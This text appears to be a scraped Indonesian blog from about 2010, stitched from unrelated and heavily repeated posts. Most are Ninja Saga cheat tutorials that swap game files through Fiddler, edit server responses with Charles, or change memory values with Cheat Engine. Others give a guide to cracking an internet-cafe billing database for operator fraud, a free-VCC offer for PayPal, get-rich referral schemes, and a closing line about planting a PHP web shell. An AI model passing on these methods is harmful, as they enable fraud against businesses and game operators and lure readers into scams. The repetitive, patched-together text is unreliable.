if you have not been verified paypal account, now you do not have to worry anymore
Direct click here
and get a free VCC. sign up now and enjoy. how this works.
good luck
if you have not been verified paypal account, now you do not have to worry anymore
Direct click here
and get a free VCC. sign up now and enjoy. how this works.
good luck
nie buat kalian semua ada tutorial
Mengganti password admin tanpa tools
tanpa memerlukan tool untuk membobol password administrator windows XP
silahkan download tutorialnya DISINI
Mengedit Database Billling Explorer
Billing Explorer mampu menyimpan semua hasil transaksi dan semua konfigurasinya di sebuah file yang berekstensikan *.008 ( 008 file ) nah mungkin gak gw doank yg punya fikiran file ini sebenernya file apaan c??? ternyata setelah di obok2 file tersebut adalah File database yg diubah ekstensi aslinya mnjadi *.008. disini gw bakalan coba kasih tau gimana cara bacanya tapi jangan punya harapan untuk bisa membaca password Admin dolo. Trik ini mungkin sangat berharga buat para Operator warnet yg menggunakan Billing ini dan ingin melakukan sedikit kecurangan tetapi tidak di beri tau password admin pada billing (Seperti yg di alami Kakak gw). Oke gw kira cukup basa-basi kita . Pastikan billing server dalam keadaan non aktif..
Yang musti loe lakuin adalah buka lokasi dimana software billing di install
contoh : “D:\Billing\Billing explorer\” Lihat
disana bakal ada file ber ekstensi *.008....., (download ltutoria lenkap)
download tutorial lengkap DISINI!!
credit by MUHDI
READ MORE - Cara ngehack billing
Billing Explorer mampu menyimpan semua hasil transaksi dan semua konfigurasinya di sebuah file yang berekstensikan *.008 ( 008 file ) nah mungkin gak gw doank yg punya fikiran file ini sebenernya file apaan c??? ternyata setelah di obok2 file tersebut adalah File database yg diubah ekstensi aslinya mnjadi *.008. disini gw bakalan coba kasih tau gimana cara bacanya tapi jangan punya harapan untuk bisa membaca password Admin dolo. Trik ini mungkin sangat berharga buat para Operator warnet yg menggunakan Billing ini dan ingin melakukan sedikit kecurangan tetapi tidak di beri tau password admin pada billing (Seperti yg di alami Kakak gw). Oke gw kira cukup basa-basi kita . Pastikan billing server dalam keadaan non aktif..
Yang musti loe lakuin adalah buka lokasi dimana software billing di install
contoh : “D:\Billing\Billing explorer\” Lihat
disana bakal ada file ber ekstensi *.008....., (download ltutoria lenkap)
download tutorial lengkap DISINI!!
credit by MUHDI
langsung saja tidak usah panjang lebar ,.
hanya penjelasan sedikit,,
langsung isi form pendaftaran..
setelah selesai comfirmasi activation email,,
buka email dan ikuti link. aktivation, dan tara.,., (liat sendiri)
good luck freand
caranya mudah tinggal daftar 
TOOLS REQUIRED:
[Mozzila] [Chrome] [Safari]
1. Fiddler2
2. Emblem dat [DOWNLOAD]
3. data_library_en [DOWNOAD]
4. vidio tutorial (download)
5.download contoh image (download)
INSTRUCTIONS:
Steps:
1. Download the required file from the link above.
2. It is in .rar format, so you will need WinRAR to extract the files out.
3. Extract them all
4. Open Fiddler.
5. Select file and drag it into the Autoresponder tab of Fiddler.
6. Make sure 'Enable auto...' and 'Permit passthrough...' are both ticked.
7. Enter Ninja Saga....
dont forget to clear catche
Take note: del char>refresh browser> choose hair style then turn off your fidder2 to make it work and refresh once again. YOURE DONE!
credite : Godknows
Sebelum mengulas tentang cara mendapatkan dollar gratis dari ziddu, ada baiknya anda melihat bukti pembayarn di bawah ini (bukti pembayaran ini masih menampilkan milik teman, karena total earning saya belum mencapai minimum payout).
Ziddu adalah Free Unlimited File Hosting. Anda dapat menyimpan file anda di Ziddu secara GRATIS dan kemudian menyebarkannya di internet. Salah satu keuntungan terbaiknya adalah anda tidak perlu lagi membawa flasdish atau hardisk kemana-mana jika anda mempunyai jumlah file yang sangat besar selama masih ada koneksi jaringan internet, anda cukup mengingat username dan password anda di ziddu.Kita bisa upload file kita yang akan di share (di bagi) dengan orang lain. Dimana orang lain tersebut nantinya bisa men-download file yang kita upload tadi. Bagi Anda yang ingin mengupload file-file seperti file dokumen, file word, e-book, mp3, pdf, gambar atau file apapun ke internet saya merekomendasikan Anda menggunakan fasilitas dari Ziddu.
Anda bebas menyimpan file-file yang ingin Anda sebarkan di internet tanpa dibatasi kuota. Setelah Anda meng upload file di Ziddu maka anda akan diberikan link download dimana Anda dapat menyebarkan link download file Anda tersebut. Anda dapat meng-copy link download tersebut yang kemudian dapat anda paste di Facebook anda, blog anda, di Friendster atau mengirimkannya melalui email kepada teman anda.
Anda bebas menyimpan file-file yang ingin Anda sebarkan di internet tanpa dibatasi kuota. Setelah Anda meng upload file di Ziddu maka anda akan diberikan link download dimana Anda dapat menyebarkan link download file Anda tersebut. Anda dapat meng-copy link download tersebut yang kemudian dapat anda paste di Facebook anda, blog anda, di Friendster atau mengirimkannya melalui email kepada teman anda.
Berikut perinciannya:
Anda akan DIBAYAR $0.001 jika ada yang 1 kali men downloadnya. Jika di akumulasikan akan seperti ini..
Anda akan DIBAYAR $0.001 jika ada yang 1 kali men downloadnya. Jika di akumulasikan akan seperti ini..
10000 Unique Downloads: $10 USD
50000 Unique Downloads: $50 USD
100000 Unique Downloads: $100 USD
500000 Unique Downloads: $500 USD
1000000 Unique Downloads: $1000 USD
50000 Unique Downloads: $50 USD
100000 Unique Downloads: $100 USD
500000 Unique Downloads: $500 USD
1000000 Unique Downloads: $1000 USD
Bonus juga akan diberikan jika Anda merekomendasikan orang lain untuk menggunakan Ziddu sebesar $0.10 Dolar. Nantinya Anda akan diberikan link refferal oleh Ziddu. Ziddu akan mengirimkan pendapatan Anda setelah mencapai 10 dolar.
Anda berminat?
Silakan daftar gratis Ziddu disini atau klik banner di bawah :
download juga tutorial lengkap DISINI
Silakan daftar gratis Ziddu disini atau klik banner di bawah :
download juga tutorial lengkap DISINI
Anda ingin mendapatkan dollar dari aktifitas Anda sehari-hari di Facebook. Tertarik? Bagaimana caranya?
Ada aplikasi baru yang harus Anda coba di Facebook yaitu EASY CASH. Aplikasi ini mirip dengan program Paypal Whislist yang membayar setiap berhasil mengajak teman bergabung (Pay per Lead).
Komisi yang Anda dapatkan jika mendaftar di Easy Cash yaitu sebesar 1 dollar setelah bergabung dan akan dibayar sebesar 0,01 dollar per teman yang Anda ajak untuk bergabung. Minimum pembayaran di Easy Cash yaitu 5 dollar, pembayaran komisi yang Anda kumpulkan akan dilakukan tanggal 1 dan 16 setiap bulan. Metode pembayarannya menggunakan Paypal. Bila Anda tidak mempunyai akun Paypal silahkan mendaftar terlebih dahulu di www.paypal.com
Cara mendaftar di Easy Cash Facebook:
1. Buka akun Facebook Anda.
2. Lalu klik link berikut ini DAFTAR SEKARANG, untuk mendaftar di Easy Cash. Setelah mendaftar Anda langsung mendapatkan 1 dollar. Lumayankan?
3. Setelah klik link diatas, lalu klik "Izinkan".
4. Nah, sekarang Anda telah terdaftar dan mendapatkan 1 dollar. Segeralah ajak teman-teman Anda untuk bergabung di Easy Cash Facebook.
Catatan: "Aplikasi Easy Cash ini belum teridentifikasi sebagai Scam. Jadi jangan buang-buang waktu Anda, segeralah untuk bergabung di aplikasi baru Facebook ini.
download
READ MORE - Easy Cash, Cara Mudah Dapat Dollar Via Facebook
Ada aplikasi baru yang harus Anda coba di Facebook yaitu EASY CASH. Aplikasi ini mirip dengan program Paypal Whislist yang membayar setiap berhasil mengajak teman bergabung (Pay per Lead).
Komisi yang Anda dapatkan jika mendaftar di Easy Cash yaitu sebesar 1 dollar setelah bergabung dan akan dibayar sebesar 0,01 dollar per teman yang Anda ajak untuk bergabung. Minimum pembayaran di Easy Cash yaitu 5 dollar, pembayaran komisi yang Anda kumpulkan akan dilakukan tanggal 1 dan 16 setiap bulan. Metode pembayarannya menggunakan Paypal. Bila Anda tidak mempunyai akun Paypal silahkan mendaftar terlebih dahulu di www.paypal.com
Cara mendaftar di Easy Cash Facebook:
1. Buka akun Facebook Anda.
2. Lalu klik link berikut ini DAFTAR SEKARANG, untuk mendaftar di Easy Cash. Setelah mendaftar Anda langsung mendapatkan 1 dollar. Lumayankan?
3. Setelah klik link diatas, lalu klik "Izinkan".
4. Nah, sekarang Anda telah terdaftar dan mendapatkan 1 dollar. Segeralah ajak teman-teman Anda untuk bergabung di Easy Cash Facebook.
Catatan: "Aplikasi Easy Cash ini belum teridentifikasi sebagai Scam. Jadi jangan buang-buang waktu Anda, segeralah untuk bergabung di aplikasi baru Facebook ini.
download
Free Token Ninja Saga III
Free Token yang akan Saya bahas ini tidak jauh dengan Cara yang ini klik skip buat melitat , karena pada intinya ini bukan gratis dan kita harus sedikit berusaha untuk merauk dolarnya. Kalo sebelumnya saya memberikan Alamat ini klik skip buat melitat , dan kita langsung bisa mendapatkan $ Secara langsung, Tapi kali ini saya akan memberikan alamat yang baru dan kalian tinggal daftar di sana, tai memang pendaatannya lebih sedikit Daripada alamt diatas.Disini kita pake di bawah ini Dan cara kerjanya seperti di bawah ini
- daftar disini klik skip
- isikan data kalian..
- klik registrasi..
- selesai deh registrasinya, mudah kan??
CARA MENDAPATKAN UANG DARI MONEYBUMPER
mudah sekali, ada 2 cara...
1. "bumped it"
bisa disebut "memberikan rating pada sebuah situs".. begini caranya:
- klik home,..
- pada bagian tabel dibawah, pada tab paling kanan ada tulisan bumped it, jika anda meng-klik bumped it pada salah satu situs, maka anda mendapat $0,02. maksimal 5 kali bumped dalam sehari. jadi, total $0,2sehari
2. "ngajak teman"
- jika kita mengajak teman dan registrasi, maka kita mendapat $0,2
- dan disini kita beruntung, KITA AKAN MENDAPAT KOMISI SETENGAH JUMLAH UANG DARI TEMAN YANG TELAH KITA AJAK TERSEBUT.. misal:
- gw ngajak si budi, lalu budi bumped salah satu situs dan mendapat $0,2, maka otomatis uang kita bertambah $0,05...
CARA MENGIRIM UANG KE PAYPAL / ALERTPAY
- klik cash out, minimal kita bisa cash out dengan $15
- pilih opsi pengiriman, paypal / alertpay..
- pilih jumlah uang yang akan di kirim.
- klik cash out
- berhasil deh, tunggu 3 hari dan cek akun paypal anda, otomatis uang anda sudah masuk..
GOOD LUCK
ANDA bisa mendapatkan uang dari situ buktikan sendiri,,
anda mendapatkan gratis $3 dari sing up
jadi tunggu apalagi silahkan daftarkan blog anda
It is very easy and simple just register your website or blog HERE!!!
YOU can make money from it see for yourself,,
you get a free $ 3 from the sing-up
so are you waiting for please register your blog
cara mudah mendapatkan dollar dengan mudah dan cepat, tidaklah susah
saat ini sudah ada layanan dolar, free sing up
sekali dafttar kita bisa mendapatkan $25 dan bisa
* You start with a $25 balance and it's free.
* will add up to $20 per day
silahkan daftar sekarang gratis
READ MORE - CARA MUDAH MENDAPATKAN DOLLAR DENGAN CEPAT - EASY WAY TO GET DOLLARS QUICKLY
saat ini sudah ada layanan dolar, free sing up
sekali dafttar kita bisa mendapatkan $25 dan bisa
* You start with a $25 balance and it's free.
* will add up to $20 per day
silahkan daftar sekarang gratis
you can earn money very easily, without having to hard hard work!
easy way.,., you live list.,.
you can register here
you can register here
you can register here
you can register here
good luck
talen token emblem mejadi gold dan free user
misi nagita: anda akan mendapatkan senjata nagita
good mode talen mejadi lvl 10
creedit dari zokage lampung editing by ME!!!!
password : jogger
cara makek nya drak file ke fiddler.,., sebelum play NS
setelah masuk NS liat misi TP.,.
passti 1000000
englisth
play mission there TP TP 1000000
talen token form the gold emblems and free user
Nagita mission: you'll get a weapon Nagita
good mode becoming lvl 10 talen
Download!
Do not forget to click earn tokens or here
creedit of zokage lampung editing by ME!!
password : jogger
talen token form the gold emblems and free user
Nagita mission: you'll get a weapon Nagita
good mode becoming lvl 10 talen
Download!
Do not forget to click earn tokens or here
creedit of zokage lampung editing by ME!!
password : jogger
* Fiddler2
* Download file yang diperlukan
* Firefox / Chrome
Langkah-langkah:
1. Download file yang diperlukan dari link di atas.
2. Hal ini dalam format. rar, jadi anda perlu WinRAR untuk mengekstrak file keluar.
3. Ekstrak
4. Buka Fiddler.
5. Pilih file dan tarik ke tab Autoresponder dari Fiddler.
6. Membuat 'auto Aktifkan ...' yakin dan 'Izin passthrough ...' keduanya dicentang.
7. Masukkan Ninja Markas Saga>
8. Mengkonversi jumlah Exp dan klik Xchange! Akhirnya! Anda selesai! ps jangan lepaskan Anda Saga Ninja atau akan membuat Anda error!
Persyaratan Level: 20 Rank diperlukan: Chunin
jangan lupa klik earn token on image or HERE
- Ninja Saga Hack -
HOMEFACEBOOK MENYIT-NYIT.NET
SENIN, 06 DESEMBER 2010
Share Ninja Saga Hack AUTO EXP
New Ninja Saga AUTO EXP
Tutorial
Drag File Ke Fiddler
Tutorial Exp
Bli Exp Di Headquarters
Terserah Tunggu Proses selesai ..
Cheat Persyaratan Lv 20 N 40 ke Atas .
Untuk Link : Download Link
HOMEFACEBOOK MENYIT-NYIT.NET
SENIN, 06 DESEMBER 2010
Share Ninja Saga Hack AUTO EXP
New Ninja Saga AUTO EXP
Tutorial
Drag File Ke Fiddler
Tutorial Exp
Bli Exp Di Headquarters
Terserah Tunggu Proses selesai ..
Cheat Persyaratan Lv 20 N 40 ke Atas .
Untuk Link : Download Link
pass: autonet
langsung saja ya broww.,.
1. buka broswer anda and masuk facebbok.com and masuk char anda di sini
2. mainkan misi anda sampai anda mendapatkan share token
3. tapi jangan share token dolo
4. panggil temen - temen anda untuk ngeklaim shere tersebut
5. masukkan file swf nya di fiddler.
6. clear capce fiddler dan broswer.
7. dan share token yang belum anda shere tadi.
8. nikmati shere tersebut.
9. selesai...
10. salam jabat erat RW :D
tambahan klo emang ada bagi dong hehhee
READ MORE - cheat share token 10000 ninja saga
1. buka broswer anda and masuk facebbok.com and masuk char anda di sini
2. mainkan misi anda sampai anda mendapatkan share token
3. tapi jangan share token dolo
4. panggil temen - temen anda untuk ngeklaim shere tersebut
5. masukkan file swf nya di fiddler.
6. clear capce fiddler dan broswer.
7. dan share token yang belum anda shere tadi.
8. nikmati shere tersebut.
9. selesai...
10. salam jabat erat RW :D
tambahan klo emang ada bagi dong hehhee
Tools:
- Firefox
- Cheat Engine 5.5
Steps:
Open Cheat engine 5.5
Go into Ninja Saga
Go to Academy and Click on a skill that has “Training Time – Instant”
In C.E, Enable Speedhack and set value to “0″
Click the “BUY” 3 times
Now click on the skill that you want to learn (a skill that requires Tokens to learn) .
Change the Speedhack back to “1″
Now go to the ARENA and Challenge your friends and fight them to save the game
Refresh the game and you still have the Token Skill
Repeat to acquire all the Token skills you want.
- Open Cheat engine 5.5
- Go into Ninja Saga
- Go to Academy and Click on a skill that has “Training Time – Instant”
- In C.E, Enable Speedhack and set value to “0″
- Click the “BUY” 3 times
- Now click on the skill that you want to learn (a skill that requires Tokens to learn) .
- Change the Speedhack back to “1″
- Now go to the ARENA and Challenge your friends and fight them to save the game
- Refresh the game and you still have the Token Skill
- Repeat to acquire all the Token skills you want.
langkah - langkah Cheat Ninja Saga NS 03122010 3 Desember 2010 - cheat gold 100 jt
1. Open NS ---> sampai posisi play.http://speechyourm1nd.blogspot.com/
2. open fiddler--> cari auto responder-->centang permit dan enable
3. Drag file shop_new ke fiddler
4. Kembali ke NS -->>play ---> ubah mode fiddler--->klik force traffic to fiddler di kanan bawah (pojok) firefox anda.
5. Selesaikan misi Rewardnya agar Reward bisa terbuka---> tapi jangan di Claim (biarkan saja)
6. Setelah Reward terbuka ---->masuk shop --->> item----->>buy gold 100 juta by faro
7. setelah itu keluar shop -->>tunggu 20 detikhttp://speechyourm1nd.blogspot.com/
8. Refreshhh --> masuk NS lagi dan gold anda bertambah 100 juta
9. selesai.
File Download
pergunakan cheat dengan bijak
5. Selesaikan misi Rewardnya agar Reward bisa terbuka---> tapi jangan di Claim (biarkan saja)
6. Setelah Reward terbuka ---->masuk shop --->> item----->>buy gold 100 juta by faro
7. setelah itu keluar shop -->>tunggu 20 detikhttp://speechyourm1nd.blogspot.com/
8. Refreshhh --> masuk NS lagi dan gold anda bertambah 100 juta
9. selesai.
File Download
pergunakan cheat dengan bijak
langsung aja broww...
ambil senjata kalian...maksudnya CE (5.6)
google croom
1 buka ninja saga kalian
2 buka CE kalian
3 beli kunai lvl 1 di pasar
4 buka gear, ganti eqip kunai tadi yg baru dibeli dgn senjata apa aja
5 halaman gear jgn di tutup dolo...terus buka CE..proses..cari google crom 1 by 1 yg aktif
6 secara bergantian coba scan kode ini "wpn1" (tnp kutip)..scan ubah text..also scan memori dan scan
7 di proses kira2 ada 2-5 google crom.exe... apabila tidak keluar hasil scannya silahkan kembali scan dgn google crom.exe lainnya.
8 setelah keluar addresnya klik salah 1 adrres dan tekan ctrl+a....klik tanda panah
9 setelah keluar di bawah klik salah satunya...dan teken ctrl+a..klik kanan...value...ganti value dgn kode senjatanya yg kamu inginkan
dan..bismillah...munculah senjata yg kamu inginkan( ingat!!..ini senjata kamu pilih harus setara dgn lvl kamu ato dibawahnya)
ini kode senjatanya:
1 : Kunai LVL 1
2 : Sickle LVL 2
3 : Sai LVL 3
4 : Tonfa
5 : Windmill Shuriken
6 : Battle Umbrella LVL 10 ( PREMIUM/TOKEN )
7 : Ocean Sword
8 : Tri-Star Shuriken
9 : Shark Skin Sword
10 : Decapitating Sword
11 : Tailed Jutte
12 : Pointed Edge Kunai LVL 7
13 : Chained Kama
14 : Arrow Head Kunai LVL 4
15 : Arrow Head Kunai Ex LVL 8
16 : Arrow Head Kunai FF
17 : The ultimate Arrow Head Kunai
18 : Short Manji Sai
19 : Tiger Tooth Kunai LVL 9
20 : Twin Tail Kunai
21 : Midori Sai
22 : Tri-Star Kunai
23 : Short Serpent Sickle
24 : Spring Kunai LVL 5
25 : Giant Kunai
26 : Twin Tailed Jutte
27 : Knife Edge Kunai
28 : Chrome Sai LVL 11
29 : Black Ripper Sickle
30 : Bone Hand Scythe LVL 7 ( TOken )
31 : Elegant Sai
32 : Golden Sai
33 : Hook Hand Sickle
34 : Lightning Sai
35 : Iron Sai LVL 6
36 : Manji Sai
37 : Quad Edge Claw
38 : Ritual Kama LVL 9 ( TOken )
39 : Small Tooth Kunai LVL 10
40 : Silver Sai
41 : War Sickle
42 : Sword Sai
43 : Short Cleaver Sword <---------
44 : Wavy Blade
45 : Bloody Ritual Kunai
46 : Wolf Claw Dagger
47 : Crescent Butcher Knife
48 : Bone Machete
49 : Katana
50 : Iron Dagger
51 : Bandit Blade
53 : Nomad Blade
54 : Sharp Blade
55 : Dark War Edge
56 : Hole Sword
57 : Tusk Sword LVL 42
58 : Thick Broadsword
59 : Scorpion Tail Blade
60 : Blood Charm Tessen
61 : Ice Wolf Sword
62 : Blazing Shuriken
63 : Rising-sun Sword
64 : Lollipop
65 : Candy Stick
66 : Wreath of Leaf
67 : Turkey Leg
68 : Green Leaf Sickle
69 : Nen-ryu Tessen
70 : Viper Tusk Sword
71 : Shark Head Sword
72 : Kanesada
73 : Crimson Katana
74 : Skull Broadsword LVL 52
75 : Ying-yang Broadsword
76 : Dark Dragon Katana
77 : Hard Edge Axe
78 : Ice Crystal Sword
79 : Dark Plate Blade
80 : Blade of Concealment
81 : Axis Dual Kunai
82 : Dark Ruby Edge LVL 46
83 : Giant Torsion Broadsword
84 : Black Wing Sai
85 : Handy Sai
86 : Sacrificial Blade
87 : Rusty Scissor Kunai
88 : Superior Jutte
89 : Platium Jutte
90 : kosong
91 : Straight Spear
92 : Harrow
93 : Japanese Dagger
94 : Hoe
95 : Handle Paper Fans
96 : kosong
97 : Bodkin Dagger
98 : Four-Point Shuriken
99 : Iron Ring Broadsword
Wpn100 : Carbon Dagger
wpn101 : hook
wpn102 : guard dagger
wpn103 : bronze kunai
wpn104 : bronze plate blade
wpn105 : scimitar
wpn106 : steel blade
wpn107 : heavy armor balade 100token
wpn108 : kosong
wpn109 : dorsal fin sword 100 token
wpn110 : hooked cutlass
wpn111 : kotetsu
wpn112 : teddy bear
wpn113 : bouquet of roses
wpn114 : chokolate sword
wpn115 : kosong sampai 118
wpn119 : blood dringker 400 token
wpn120 : tengu spear
wpn121 : ginkotsu saw
wpn122 : tengu umbrella
wpn123 : yanki sickle
wpn124 : byako sword
wpn125 : shadow tooth 500 token
wpn126 : golem guard 800 token
wpn127 : saul watcher 800 token
wpn128 : wheel monk 800 token
wpn129 : gekko balde 800 token
wpn130 : dark moryo 800 token
wpn131 : saijo kotetsu 100 token
wpn132 : white bouquet
wpn133 : colorful bouquet
wpn134 : dazzle windmill 400 token
wpn135 : kaza obake 300 token
wpn136 : hazy kotetsu 300 token
wpn137 : senden 600 token
wpn138 : sea bonze 300 token
wpn139 : jinkujaku 300 token
wpn140 : blue river 600 token
wpn141 : snake soul 300 token
wpn142 : mountain haze 300 token
wpn143 : violet lightning 300 token
wpn144 : wind walker 600 token
wpn145 : ichi no katana 400token
wpn146 : saul resonance 400token
wpn147 : rusty bronze 400token
wpn148 : disciple of blood 800token
wpn149 : four soul shuriken 800token
wpn150 : crazy wolf 300token
wpn151 : tenji 300token
wpn152 : sessho shuriken 100token
wpn153 : kosong
wpn154 : dull balde katana (belumbisa di gunakan)
wpn155 : practince naginata
wpn156 : wind katana 200token
wpn157 : dark sou katana 200token
wpn158 : stone kunai LVL 42
wpn159 : stone giant kunai (belum bisa di gunakan)
wpn160 : knot dager kunai
wpn161 : dart kunai LVL 44
wpn162 : red fang kunai (belum bisa di gunakan )
wpn163 : ketsuiki (belumbisa di gunakan )
wpn164 : secred genin kunai 400 token
wpn165 : snow-nin kunai
wpn166 : tri-blade kunai (belumbisa di gunakan)
wpn167 : white snake katana 200token
wpn168 : short wing sai
wpn169 : orange manji sai
wpn170 : pratiioner sai
wpn171 : short chrome sai
wpn172 : devil thorn sai
wpn173 : blue pearl kunai
wpn174 : izanami (belum bisa di gunakan)
wpn175 : kusanagi 200token
wpn176 : red card
wpn177 : white card
wpn178 : yellow card
wpn179 : nindan blood drinker 100token
wpn180 : sandan blood drinker(belumbisa di gunakan )
wpn181 : nindan shadow tooth 200token
wpn182 : sandan shadow tooth (belumbisa di gunakan )
wpn183 : nidan dazzle windmill (belumbisa di gunakan )
wpn184 : nidan kasa obake (belumbisa di gunakan )
wpn185 : sandan kasa obake (belumbisa di gunakan )
wpn186 : nidan senden (belumbisa di gunakan )
wpn187 : nidan seabonze (belumbisa di gunakan )
wpn188 : nidan jinkujaku (belumbisa di gunakan )
wpn189 : nidan blue river (belumbisa di gunakan )
wpn190 : nidan snake saul (belumbisa di gunakan )
wpn191 : sandan snake saul (belumbisa di gunakan )
wpn192 : kosong sanpai wpn 197
wpn198 : shuriken dark cicada 1000token
wpn199 : carnival lantern
wpn200 : carnival folding fan
wpn201 : carnival bachi
wpn202 : kosong sampai 274
wpn275 : soul katana red cloud 100token
wpn276 : apes banana
wpn277 : kosong sampai 283
wpn284 : great tengu spear 800token
wpn285 : ginkotsu militari saw 600 token
wpn286 : great tengu umbrela 800token
wpn287 : burning yanki sickle 800token
wpn288 : angry tiger sword 800token
wpn289 : dark gedo shuriken 800token
wpn290 : smelly banana 800token
Tools
Fiddler2
FILE
Password : Queeenza
Directions:
-Drag the file on the Auto Responder,clear cache
tara.. jadi deh
READ MORE - Cheat Reward Clothes Clan not permanent
Fiddler2
FILE
Password : Queeenza
Directions:
-Drag the file on the Auto Responder,clear cache
tara.. jadi deh
Gini gan kan talent yg di miliki shinobi tuh cuman 1 adanya
ga bisa lebih ga bisa kurang hehe :D
Tools :
1.Charles Debuggin Proxy Versi Ane :D
2.Mozilla FireFox Password Charles : evolution
Steps :
☼ Buka Charles Buka Firefox , start Ninja saganya jangan di play ok ?
☼ Breakpoint Ninja Saga
☼ Execute 7x Note : jangan di Execute Langsung Klik Edit Response > Amf > baru di execute
Kalo langsung di exe cute ntar masuk ke ninja saga
☼ Kalo udh execute 7x ada data bloodine
☼ Lo buka tu data ada info talent lo
misal info skill:1 skill code:1000 lv:10
☼ Lo cari yg code talent lv 50 lo bisa liat di skillnya misal talent lo Enregad forest ada info skill 4 lo ubah jadi 1 semua yg talent lv 50 jgn yg 40
☼ Trus ganti skillnya juga sesuai info skill :1 klo 1 itu demon song lo ganti jadi skill 1013,1014,1032 harus berurutan dari atas
☼ Lu execute trus talent lo lv 40 jadi talent 400 token emblem jgn di upgrade klo di upgrade eror trus talent lv 50 lo kosong tenang aja talent asli lo g bakal ilang
☼ Lu klik discover..trus buy talent ke 2 yg lu suka kalo sudah di upgrade lv 1 aja trus refresh "Coba Liat Talent Lo Punya" liat nya pas maen di misi
Attention : Cheat Ini Permanent Soalnya pake Charles :D Kalo Banned Bukan Resiko Gw , Sebaiknya pake di char cacad oke ?
- Jangan di gunain di live pvp entar lo di SS di laporin terus di banned :'(
Kalo Error saat belinya pas loading News Anacoment Season 10 Clan langsung tutup ( CLOSE ) charlesnya
ga bisa lebih ga bisa kurang hehe :D
Tools :
1.Charles Debuggin Proxy Versi Ane :D
2.Mozilla FireFox Password Charles : evolution
Steps :
☼ Buka Charles Buka Firefox , start Ninja saganya jangan di play ok ?
☼ Breakpoint Ninja Saga
☼ Execute 7x Note : jangan di Execute Langsung Klik Edit Response > Amf > baru di execute
Kalo langsung di exe cute ntar masuk ke ninja saga
☼ Kalo udh execute 7x ada data bloodine
☼ Lo buka tu data ada info talent lo
misal info skill:1 skill code:1000 lv:10
☼ Lo cari yg code talent lv 50 lo bisa liat di skillnya misal talent lo Enregad forest ada info skill 4 lo ubah jadi 1 semua yg talent lv 50 jgn yg 40
☼ Trus ganti skillnya juga sesuai info skill :1 klo 1 itu demon song lo ganti jadi skill 1013,1014,1032 harus berurutan dari atas
☼ Lu execute trus talent lo lv 40 jadi talent 400 token emblem jgn di upgrade klo di upgrade eror trus talent lv 50 lo kosong tenang aja talent asli lo g bakal ilang
☼ Lu klik discover..trus buy talent ke 2 yg lu suka kalo sudah di upgrade lv 1 aja trus refresh "Coba Liat Talent Lo Punya" liat nya pas maen di misi
Attention : Cheat Ini Permanent Soalnya pake Charles :D Kalo Banned Bukan Resiko Gw , Sebaiknya pake di char cacad oke ?
- Jangan di gunain di live pvp entar lo di SS di laporin terus di banned :'(
Kalo Error saat belinya pas loading News Anacoment Season 10 Clan langsung tutup ( CLOSE ) charlesnya
Kita Bisa nikmatin deh Weapon gold dari lvl 1 sampe lvl 60
tapi cuman item gold bro ya mayan lah buat have fun tapi emang lebih enak cheat gold langsung aja
tapi ga apa" deh hehehe :D
Tools :
1.Fiddler'2
2.Fiddler'2 Dotnet Fx
3.Afixe Mouse Recorder
4.File SWF Evolution
Password : evolution
REGEX :
REGEX:(?insx)^.*mission_2\.swf$
tapi cuman item gold bro ya mayan lah buat have fun tapi emang lebih enak cheat gold langsung aja
tapi ga apa" deh hehehe :D
Tools :
1.Fiddler'2
2.Fiddler'2 Dotnet Fx
3.Afixe Mouse Recorder
4.File SWF Evolution
Password : evolution
REGEX :
REGEX:(?insx)^.*mission_2\.swf$
Tools
Fiddler
GodKnows Talent.rar [Download]
Features:
•All talent's cooldown = 0
•Effects and Damage are not God Mode but above Lvl 10.
•All skill talents doesn't require CP.
•Practice with unusual enemies.
•Talent upgrades are savable but not the damage
Steps for Talent Hack:
•Download the required files.
•Extract GodKnows Talent.rar
•Drag to fiddler
•Refresh Ninja Saga
•You can now upgrade open all your talents even without upgrading it until lvl5.
READ MORE - Super Talent Hack
Fiddler
GodKnows Talent.rar [Download]
Features:
•All talent's cooldown = 0
•Effects and Damage are not God Mode but above Lvl 10.
•All skill talents doesn't require CP.
•Practice with unusual enemies.
•Talent upgrades are savable but not the damage
Steps for Talent Hack:
•Download the required files.
•Extract GodKnows Talent.rar
•Drag to fiddler
•Refresh Ninja Saga
•You can now upgrade open all your talents even without upgrading it until lvl5.
Berapa kali anda membuka Google Translate dalam sehari? berapa banyak waktu yang terbuang hanya untuk memilih bahasa dan melakukan copy paste teks. Tentu saja cara manual ini sangat membosankan, dan memang cara konvesional ini sebaiknya anda tinggalkan saja karena sekarang sudah tersedia cara yang lebih mudah yaitu dengan bantuan tools dari Google Translate Client v3.1
Aplikasi Translate Client sederhanan namun fungsional ini benar-benar memberikan kemudahan yang nyata. Kita tidak lagi harus melakukan cara manual copy paste karena sudah disediakan fasilitas auto paste dengan ditandai G-icon setiap kali anda melakukan blocking pada text. Untuk dukungan bahasa sendiri jangan khawatir, karena sama seperti pada situs resmi google translate layanan ini juga support lebih dari 40 bahasa. Tentu saja untuk menggunakan aplikasi ini anda harus tetap pada status online.
Aplikasi Translate Client sederhanan namun fungsional ini benar-benar memberikan kemudahan yang nyata. Kita tidak lagi harus melakukan cara manual copy paste karena sudah disediakan fasilitas auto paste dengan ditandai G-icon setiap kali anda melakukan blocking pada text. Untuk dukungan bahasa sendiri jangan khawatir, karena sama seperti pada situs resmi google translate layanan ini juga support lebih dari 40 bahasa. Tentu saja untuk menggunakan aplikasi ini anda harus tetap pada status online.
download disini
asumsinya harus nanem shell terlebih dahulu. copas code dibawah ini. dan namai file nya terserah kamu. yang penting ekstensinya *.php.
